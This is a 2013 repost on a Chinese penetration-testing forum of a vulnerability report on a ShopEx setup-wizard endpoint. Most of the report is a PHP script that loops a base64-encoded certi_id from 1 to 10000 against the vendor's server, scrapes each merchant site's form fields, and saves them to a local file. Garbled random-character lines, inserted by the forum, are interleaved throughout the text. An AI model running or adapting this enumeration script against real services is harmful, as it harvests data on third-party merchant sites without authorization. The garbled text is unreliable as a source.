中国网络渗透测试联盟
标题:
ShopEx某接口缺陷可遍历所有用户网站
[打印本页]
作者:
admin
时间:
2013-9-21 15:59
标题:
ShopEx某接口缺陷可遍历所有用户网站
简要描述:
2 u8 {3 n% p1 V
ShopEx某接口缺陷,可遍历所有网站
0 `3 _6 W& D' N
详细说明:
' Q0 z+ y5 k' Z; y3 [: [( M
问题出现在shopex 网店使用向导页面
2 f( ], c) Q. U; d
1 {2 k) q1 x |! T: e' ^$ {
- m8 I0 t9 f. o- q; p* q- m
0 ?# X- u# }; C
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
}! P, H; ?/ }- u
8 R I7 K/ ~4 j, f/ _3 N- }, s
( n( T0 W- c* b3 J& B/ K. y
0 g- e0 d& w0 ^
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
7 ~* R- K) b& D
/ v) y, _7 _0 T+ I: V
7 z; S s- ~! O, c$ A* G
4 n0 k5 ]+ R) _- p1 g# q/ k# B
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
( h' }' s- y' b9 l* ]4 Q" q0 f
, n4 W8 }& H! {' J$ k, L
% |3 a1 G# a I3 n9 c
' @" v; T/ T3 Z( R
<?php
# K8 n I/ R- ^ S* e
) e5 z/ G* u6 A
for ($i=1; $i < 10000; $i++) { //遍历
6 K* {' l" y' u
" _5 i) S4 D, p
ShowshopExD($i);
* [- z: k/ m: _: g9 o3 b: ^/ y
! t V) m9 @% J E9 J9 r S
}
' G) g0 p1 F7 Y) y. P5 w
( r) e6 [8 A5 T/ ~' u& s) @
function ShowshopExD($cid) {
$ i1 F$ L3 ~7 d) x
* Z- r) J( N+ f5 g
$url='http://guide.ecos.shopex.cn/step2.php';
# a/ S" F! k Q2 p
- A0 h$ O8 Y! ?/ B9 j
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
( e" P2 N# x; `$ p3 t4 a- X. Z
# |: H0 @3 o+ Q# ]$ s' s! F$ F
$url = $url.'?refer='.$refer;
. T1 p6 @3 |, H, p9 b* b
6 o6 g6 S0 V6 Y; j
$ch = curl_init($url);
4 Y+ a2 j1 P' y$ ^3 w
0 n8 N/ g! l( ?- s& i
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
8 n5 ]7 d8 s5 R) |" w9 D) J* C
: Z1 @# Q1 u* \6 x9 s
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
' A |7 ]) B$ L7 o3 f" @* g
: B" a p5 t9 ~1 R
$result = curl_exec($ch);
1 J9 B' e, X: s6 B A
& T1 U; G6 Y! ?' H
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 C7 b' O4 Z' ^9 l, f
1 K9 n$ ~: M6 j! x- Y; G
if(strpos($result,$refer))
! p: k& g4 N: u. c( i5 V1 \5 h
( @% E# a' T$ V* m1 ^6 @& t
{
* V. v& t" S9 J) K
& ?, P- b6 t% ^, y
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
% r/ s* H2 a7 i( J- t
0 u0 T9 {5 c' V. B2 O
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
8 o. w6 v$ |; Y! o% @# m
6 K' K; p& T) a( Y# D" w3 N
foreach ($value[1] as $key) {
. w8 e- A3 F1 j* X9 w
8 x& y* z( o+ I( L8 o: d* c, a, Y, Y
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
" }" m) t4 p* U) W
4 D' W6 w4 E& F0 R
echo $res[1][0].':'.$res[3][0]."\r\n";
) c& W9 ^* P& [7 D$ A
( D/ U6 G; O: {+ q8 H A
$col =$res[1][0].':'.$res[3][0]."\r\n";
$ z5 {% \$ x2 L% \6 s
1 w, @6 [$ m6 O/ w' E
fwrite($fp, $col, strlen($col));
9 S# a3 y! u1 m
0 {' S9 V- R6 n/ _
}
/ f$ N( @3 H2 k& n0 }8 j# X- G
: L3 `3 c4 f! E, Y8 L P
echo '--------------------------------'."\r\n";
4 V9 N5 ]; M t3 G0 Z. _( R
7 p# v7 t, d0 g- q* ?) j
fclose($fp);
6 i' T: F/ o3 X4 r
6 B% N2 v6 x. V& R! I# w( e; m
}
* o P# y2 v2 n
3 ?/ o) Y! O. @' U9 h. n. [6 e: Z
flush();
* [& M+ ^2 c% z2 H) ] v* B- D, Y/ h
7 V1 |# `( K1 X
curl_close($ch);
2 W1 {, Q. L& c+ R* K0 S$ |
i6 N X3 {3 i1 U+ ~% T. A9 p
}
1 Z* y$ T" X) K% Z# [7 O$ m( u1 W% \
$ R5 |9 C1 t) x: B) f: _
?>
- L) r! e5 F! ]+ F: z; `
漏洞证明:
4 } H) k8 u. r* {
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
( U6 f; |! \/ L# |8 m' G, O
refer换成其他加密方式
, Y9 ^5 @ e. I* F8 M# K4 Y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2